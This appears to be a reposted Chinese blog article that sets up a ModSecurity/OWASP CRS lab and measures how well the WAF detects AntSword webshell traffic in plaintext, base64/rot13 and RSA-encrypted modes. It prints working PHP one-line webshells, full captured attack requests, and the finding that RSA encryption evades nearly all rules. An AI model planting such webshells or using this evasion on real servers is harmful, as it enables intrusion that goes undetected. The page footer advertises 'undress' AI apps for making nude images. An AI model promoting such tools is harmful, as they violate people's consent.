Operation and Maintenance
Safety
What is the performance analysis of WAF on WebShell traffic detection?
What is the performance analysis of WAF on WebShell traffic detection?
本地环境组建
从保留的截图来看,对方的php版本是5.6.40,所以我要搭一个apache+php5.6.40的测试环境。在virtualbox中打开,复制centos镜像系统链接,并按照以下步骤进行配置。
1. 安装apache
yum install -y httpd httpd -v Server version: Apache/2.4.6 (CentOS) Server built: Aug 8 2019 11:41:18
2. 安装php5.6
yum -y install epel-release rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm yum -y install php56w php56w-mysql php56w-gd libjpeg* php56w-ldap php56w-odbc php56w-pear php56w-xml php56w-xmlrpc php56w-mbstring php56w-bcmath yum -y install httpd php-gd56w php-intl56w php-mysql56w mod_ssl openssl mcrypt php5-mcrypt56w yum -y install php56w-mcrypt php56w-soap php56w-intl php56w-pdo systemctl restart httpd.service php -v PHP 5.6.40 (cli) (built: Jan 12 2019 13:11:15) Copyright (c) 1997-2016 The PHP Group
做一个index.php用以显示phpinfo(),本机访问时为了测试方便关闭firewalld
systemctl stop firewalld //当然也可以通过firewall-cmd去开放端口
3. 为了后面查看攻击流量,再装一个wireshark,包含wireshark-gnome等等,直接用*替代了。
yum install wireshark*
4. 配置apache-modsecurity手边没有waf设备,没法对流量进行测试,于是用mode-security,以及OWASP(开放Web应用程序安全性项目)核心规则集-CRS进行测试,纵然效果不如实际场景来的直观,但足以说明问题。
yum -y install mod_security cd /etc/httpd git clone https://github.com/SpiderLabs/owasp-modsecurity- crs.git mv owasp-modsecurity-crs modsecurity.d cd modsecurity-crs cp crs-setup.conf.example crs-setup.conf vi /etc/httpd/conf/httpd.conf Include conf.modules.d/*.conf Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf systemctl restart httpd
我们将将modsecurity的默认配置修改为仅记录攻击事件,而不阻断其进程。
vim /etc/httpd/conf.d/mod_security.conf SecRuleEngine On (拦截) SecRuleEngine DetectionOnly 记录 tail -f /var/log/httpd/model/modsec_audit.log //查看拦截日志
测试一些攻击向量会在log里看到记录,证明配置完成。环境搭建完成。
攻击流量配置、分析、检测
明文php-webshell配置
首先写个一句话看看明文webshell流量传输。
vim test1.php <?php @eval($_POST['aaaa']); ?>
配置蚁剑进行连接
明文流量分析
用wireshark查看测试连接的流量
POST /test1.php HTTP/1.1
Host: 192.168.1.13
Accept-Encoding: gzip, deflate
User-Agent: antSword/v2.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 993
Connection: close
aaaa=@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out){
return $out;
};
function asoutput(){
$output=ob_get_contents();
ob_end_clean();
echo "620e2fc";
echo @asenc($output);
echo "71a0ccfbc1";
}
ob_start();
try{
$D=dirname($_SERVER["SCRIPT_FILENAME"]
//dirname()函数获取给定文件路径中的目录部分,而$_SERVER['SCRIPT_FILENAME']全局预定义变量用于获取当前执行脚本的完整路径
);
if($D=="")
$D=dirname($_SERVER["PATH_TRANSLATED"]);
//如果没有获取到就用PATH_TRANSLATED,获取当前脚本所在文件系统(非文档根目录)的基本路径。这是在服务器进行虚拟到真实路径的映像后的结果。Apache 2 用户可以使用httpd.conf 中的 AcceptPathInfo On 来定义 PATH_INFO。
$R="{$D}";
if(substr($D,0,1)!="/")
{
foreach(range("C","Z")as $L)
if(is_dir("{$L}:"))$R.="{$L}:";
}
else{$R.="/";}
$R.=" ";
//以上是判断windows或者linux盘符,进而把获取的目录信息存入变量
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
//posix_getegid()返回当前进程的有效用户组ID,posix_geteuid()返回当前进程的有效用户ID
$s=($u)?$u["name"]:@get_current_user();
//get_current_user()方法进行获得PHP当前脚本所有者名称
$R.=php_uname();
//php_uname返回运行 PHP 的系统的有关信息
$R.="{$s}";
echo $R;;}
catch(Exception $e)
{echo "ERROR://".$e->getMessage();}
;
asoutput();
die();//输出
HTTP/1.1 200 OK
Date: Wed, 29 Jan 2020 12:53:30 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 136
Connection: close
Content-Type: text/html; charset=UTF-8
620e2fc/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache71a0ccfbc1
为了更加清楚antsword发出的流量包,我认真看了一下发的包,并查了一些相关函数,做注释的同时感叹了PHP函数的牛逼,并勾起了我的好奇心,对这几个函数做了本地测试。
<?php echo posix_getegid(); echo posix_getlogin(); echo get_current_user(); echo php_uname();
0 t1ger root Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64
果然牛逼!和返回包现象保持了一致。这句话可以这样重写:若直接探测明文,则该流量在waf面前毫无遮挡可言,相当于自动暴露身份
明文流量检测
waf测试结果如下:
Message: Warning. Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] Message: Warning. ..... ..... Apache-Handler: php5-script Stopwatch: 1580358081210887 7750 (- - -) Stopwatch3: 1580358081210887 7750; combined=5379, p1=753, p2=4202, p3=42, p4=155, p5=227, sr=194, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0. Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Engine-Mode: "DETECTION_ONLY"
统计数据如下,匹配规则数按照grep line|wc -l计算
| Apache-Error | Message | 匹配规则数 | level |
|---|---|---|---|
| 11 | 11 | 22 | 3 |
接下来我们先测对称密码。
Base64&&rot13 webshell配置
Antsword自带几个可供测试的shell,给我们提供了非常大的方便。
我顺便贴一下代码。先来看看base64的代码
<?php $ant=base64_decode("YXNzZXJ0");
$ant($_POST['ant']);
?>
Base64&&rot13 流量分析
POST /php_assert_script.php HTTP/1.1 Host: 192.168.1.13 Accept-Encoding: gzip, deflate User-Agent: antSword/v2.1 Content-Type: application/x-www-form-urlencoded Content-Length: 942 Connection: close ant=%40eval(%40base64_decode(%24_POST%5Bq9c4fa426fb243%5D))%3B&q9c4fa426fb243=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzRhZTE3IjtlY2hvIEBhc2VuYygkb3V0cHV0KTtlY2hvICI1YmJhN2YiO31vYl9zdGFydCgpO3RyeXskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfQkiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkMiLCJaIilhcyAkTClpZihpc19kaXIoInskTH06IikpJFIuPSJ7JEx9OiI7fWVsc2V7JFIuPSIvIjt9JFIuPSIJIjskdT0oZnVuY3Rpb25fZXhpc3RzKCJwb3NpeF9nZXRlZ2lkIikpP0Bwb3NpeF9nZXRwd3VpZChAcG9zaXhfZ2V0ZXVpZCgpKToiIjskcz0oJHUpPyR1WyJuYW1lIl06QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIJeyRzfSI7ZWNobyAkUjs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D
经过base64加密后的流量,除了eval函数外,应至少不包含这么多的高危函数。加密后,我们可以再进行测试。
Base64&&rot13 webshell流量检测
waf测试结果如下:
Message: Warning. Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file Message: Warning. Matched phrase "base64_decode" at ARGS:ant. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "301"] [id "933150"] [msg "PHP Injection Attack: High-Risk PHP Function Name Found"] [data "Matched Data: base64_decode found within ARGS:ant: @eval(@base64_decode($_post[y07ae431d0730c]));"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] ... ...
统计数据如下
| Apache-Error | Message | 匹配规则数 | level |
|---|---|---|---|
| 7 | 7 | 14 | 3 |
通过Antsword界面配置rot13加密及解密,抓包看了下流量,仅仅是将base64的加密函数变成了str_rot13
ant=%40eval(%40base64_decode -> ant=%40eval(%40str_rot13(
拦截数据和base差不多,waf统计数据如下
| Apache-Error | Message | 匹配规则数 | level |
|---|---|---|---|
| 10 | 7 | 14 | 3 |
从中可见,即使使用对称加密算法,eval、base64和rot13等函数仍然可能引发较高级别的警告。笔者尝试使用antsword提供的非对称加密算法来减少触发告警的数量,与明文传输相比可以减少一半的告警。
RSA加密流量配置
从版本2.1.0开始,Antsword的作者添加了RSA模式。蚁剑默认下仅支持PHP。另外需要Server开启php_openssl拓展。
修改php.ini,去掉extension=php_openssl.dll前的注释,重启Apache
使用方法:
Antsword->系统设置->编码管理->新建编码器->PHP RSA->命名为rsa_php->点击RSA配置->生成
1、将下方的php代码copy到虚拟机里,命名为rsa.php
2、配置antsword连接类型选择rsa_php
3、测试连接
RSA加密流量分析
贴上wireshark抓的流量
POST /rsa.php HTTP/1.1 Host: 192.168.1.13 Accept-Encoding: gzip, deflate User-Agent: antSword/v2.1 Content-Type: application/x-www-form-urlencoded Content-Length: 1712 Connection: close ant=W%2B9beN7Ltke390bzZGS5JbOBCnO8SRXW6Z8w0WaMF6CdAymaCu6NeWE9FX0kyCFs3jaLkDWkEvcTsSC2gEu85l5ugsVJUK6bTWFlVNeRBoezjTjUJZdjGvnjrxjd5Pn4iZaRjoaxAZPeZP2ozupbevWFUId4ZzkKZ7bIVPrZKk4%3D%7CYjt1kz5Gkj2N6Ajkqp3VXcg%2FEA7emPXV6oyTwZAZS9Ux1%2Fpby5PIuU9LsMZmGlMqGXvRFO23is9MUJpF66yboIAIYqpGRJCDgSP4S%2BfG6DD0lRYGEOIEsfpaLSVMhxZtR6OnFXp%2FfbXqmgGUk0a8HCUfQ83XmXS%2BRsl0Yx2PFc4%3D%7CAWtIrpychlQENib6basrK89LJcjnKk%2Bf5mVM72MOnPHxaviQFXws2TKNdGPI4SI9%2Fkwl%2FUGqB22s6NOwCza1f%2BkzGK7FqEciITMZMNFbokFsmjG8IiWkRO%2B%2BbWWnsMesfavJub9aEln41x8U97WjgKGKMMdqXZHrIRS4KU8pQhU%3D%7CXLL0DnlWOLx3hNXd2VGzmbdcgmtQoiyiiPNQCiBkAbUK1mLM14l6f22Pkl2tSSw%2F9dYIkdZ91wUok9GHDBMmKkL6D%2BJGQxrJDyQXEfytOzfzZmKqp%2BJ%2BryVm2zwLJMXTdpZ%2BUsBWgVzlD%2Bxga6%2F7rCqkG%2FtaWM6e%2BGegcS4lWTE%3D%7CJGJR50q4jSkL028qffvT%2Be%2BnJcMQth7jz86sntyuI3GZQUtjS5%2FoCByIqsGi8zPwCKS0J%2FAEiEGhAwN7%2FBQXYjyVWAs5VpDhPrVUs7EbqFgllVmrNt8T5Rt7O%2FCHVSiR2AQjyG%2BxB1LjO5ElX%2FH8Pfh35dDpVaFt3MEr1lxT69I%3D%7CSIirF52ZEhs%2FMBfco2kWouurB%2F%2FhCvLG29%2BK70a6t8Io%2FE%2F7VL5IO38s2j%2Bjq%2BSw6dUDL9cEUbEx2G2U4r0fHiDSYPbbn9WS6FbQSCPHxG6lxLHCXmmkKxj%2B2P8khyMM%2FHdVCWai%2B5L5hXYr%2BUWFkCkbv%2BUyYUSsfL29sGxWeVA%3D%7Ci1qZBSL6Dfu31cisSj3J%2BY7epLuQl62DdEWMCiZRQOz5AHFsPFsWtO59uedRC0CfMOhcbIDGGq2GNThL8VPz%2FUfLJTd3kuoFo7p225iPcYOKJS75V36ccHw3bMI3LOWcEhUF3LPX2YcaLSvwDDyHfrnWL2Qj6VmQKew8edoAIdU%3D%7CkJih4pPT70J6BiPll9o4PtH%2Byl%2BmB8%2BUPDAS%2FfAu4uzi2yDMCIdzdkaFLlnsUKewHXLf1mWWVpGkfqLCttgZed9wUtl6N22C3nQGZqZ%2FqnNiKeBYK0%2FJBmimOAf7nSMB1WF%2Bab5RmRq6cSSwrWc4ya93kVJzmIg1BdyaiycdN5I%3D%7CHV2y7vs6wQUIQ8DnvveCeD8xtjRecf%2F%2B7rAl7Y4Wa8S4Y0onKYHOz2Nz0hgBJtFN%2BLRIj9%2B%2FYyOq%2Fslq0XW%2BolQCUl5hf8%2F3Y9OmlxKvSCGf3A0IIAquqSaJXpU4w8rqVyP9Od2bgDXDzsOx8YgVdigeyZxLS0TNNODTGIATb7Y%3DHTTP/1.1 200 OK Date: Thu, 30 Jan 2020 05:47:09 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 133 Connection: close Content-Type: text/html; charset=UTF-8 8ee773/var/www/html./.Linux localhost.localdomain 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64.apache47970246
经历非对称加密算法之后,整个流量传输的数据除了length之外,肉眼已经分别不出来, 这个效果笔者比较满意.
RSA加密流量检测
Message: Warning. Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "708"] [id "920350"] [msg "Host header is a numeric IP address"] [data "192.168.1.13"] [severity "WARNING"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] Apache-Handler: php5-script Stopwatch: 1580363229118571 7666 (- - -) Stopwatch3: 1580363229118571 7666; combined=6153, p1=574, p2=5170, p3=39, p4=156, p5=213, sr=205, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/); OWASP_CRS/3.2.0. Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40 Engine-Mode: "DETECTION_ONLY"
| Apache-Error | Message | 匹配规则数 | level | | ------------ | ------- | ---------- | ----- | | 1 | 1 | 1 | -- |
waf也只能检测到Host header is a numeric IP address,这基本是说waf对于RSA加密的webshell流量基本没什么防护能力,往后的安全设备检测只能依赖于杀毒软件。
这样的加密程度对笔者本次实验来说已经够用了。然而,有许多许多问题仍然存在,例如绕过杀毒软件、代码混淆等等。每个方面都需要集中注意、细心和持久的投入。
The above is the detailed content of What is the performance analysis of WAF on WebShell traffic detection?. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1376
52
How to conduct analysis to bypass WTS-WAF
May 13, 2023 am 09:40 AM
0x01. Looking for the target inurl:.php?id=intext: Electrical Appliances I found a website of an electrical appliances company. I tested it casually and found that there is a waf but it has not been arranged yet (I found some information and it seems that you can just add a sign instead of a space. Directly Try) 0x02. The operation found that there was no waf to intercept the data and it also said sqlmap.py-uhttp://*/*.php?id=29--tables--tamperspace2plus.py tool. I tried it and found that it could not be started. .....0x03.Hand-note http://*/*.php?id=1+and+1=1#The echo is normal http://*/*.php?id=1
How to implement webshell upload under nginx load balancing
May 16, 2023 am 08:16 AM
Scenario description assumes that in a real production environment, there is an RCE vulnerability, which allows us to obtain the installation of the WebShell environment. First, before pulling the vulnerable image on GetHub, we need to install nginx and tomcat on centos in advance and configure nginx and tomcat. Configuration file, use docker to pull down the image, and reproduce the vulnerability. 1. Set up the docker environment first. 2. Test whether tomcat can be accessed. As can be seen from the above figure, the back-end tomcat is accessible. 3. Check the load balancing of nginx reverse proxy in docker. 4. Check the ant in lbsnode1 in docker. .jsp text
How to analyze and trace the source of WebShell file upload vulnerability in Mozhe Shooting Range
Jun 01, 2023 am 08:55 AM
1. After opening the URL, it was found that it was an upload page. 2. Directly uploaded the file with the suffix php, but found that it could not be uploaded. 3. Use BurpSuite to capture the packet, and change the suffix of the uploaded file with the suffix php to php5 to bypass it. After 4. Use a kitchen knife to connect. In the directory of var/www/html, a file with KEY is found. Open it and you will see key5. Open another URL, which is also an upload page, but the upload list is set. Only Allow files with the suffix .gif.jpg.png to be uploaded through 6. We write a txt one-sentence Trojan and change its suffix to jpg7. When uploading, use BurpSiuit to capture the packet and modify the file suffix to display
How Nginx protects against web attacks by using the Application Firewall Module (WAF)
Jun 10, 2023 am 08:58 AM
With the continuous development of the Internet, Web applications have become an essential part of many people's daily lives. However, various web attacks have followed, such as SQL injection, cross-site scripting, etc. These attacks may cause major security issues and seriously threaten the security and stability of web applications. In order to solve these problems, Nginx introduces the application firewall module (WAF). This article will introduce in detail how Nginx prevents web attacks by using the WAF module. What is a WAF?
WebShell security settings of Pagoda panel
Jun 21, 2023 pm 04:35 PM
As Internet security issues become increasingly prominent, the security of major websites and applications has become an increasingly important issue. Especially in website operation and maintenance management, tools such as WebShell are often needed for maintenance and repair. However, WebShell is also often used by hackers and becomes an entry point for attackers to invade. This article will introduce the WebShell security settings of the Pagoda Panel to help website administrators improve the security of the site. 1. The concept and common uses of WebShell 1. Concept WebShell is
Nginx HTTP firewall and WAF
Jun 10, 2023 am 10:22 AM
Nginx is a high-performance HTTP server widely used in web development. It is often used to build web solutions such as reverse proxy, load balancing, and dynamic caching. Due to its reliability, security and scalability, more and more web applications adopt Nginx as their basic service. However, due to the widespread nature and openness of web applications, they are often targets of hackers and malicious attacks. In such an environment, protecting the security of web applications is particularly important. So, Nginx
PHP form protection technology: using w3af Web App security scanner
Jun 24, 2023 am 08:25 AM
With the increasing popularity of Internet applications, security issues have attracted more and more attention. For the security of PHP forms, some protection technologies can be used to ensure it. This article describes how to use the w3afWebApp security scanner to improve the security of PHP forms. 1. w3afWebApp security scanner w3af is a free, open source web application security scanner. It identifies and exploits web application vulnerabilities, providing specific information about possible vulnerabilities. w3a
A brief discussion on the Webshell of the Empire CMS framework
Mar 16, 2021 am 10:48 AM
This article introduces you to the Webshell of the Empire CMS framework. It has certain reference value. Friends in need can refer to it. I hope it will be helpful to everyone.
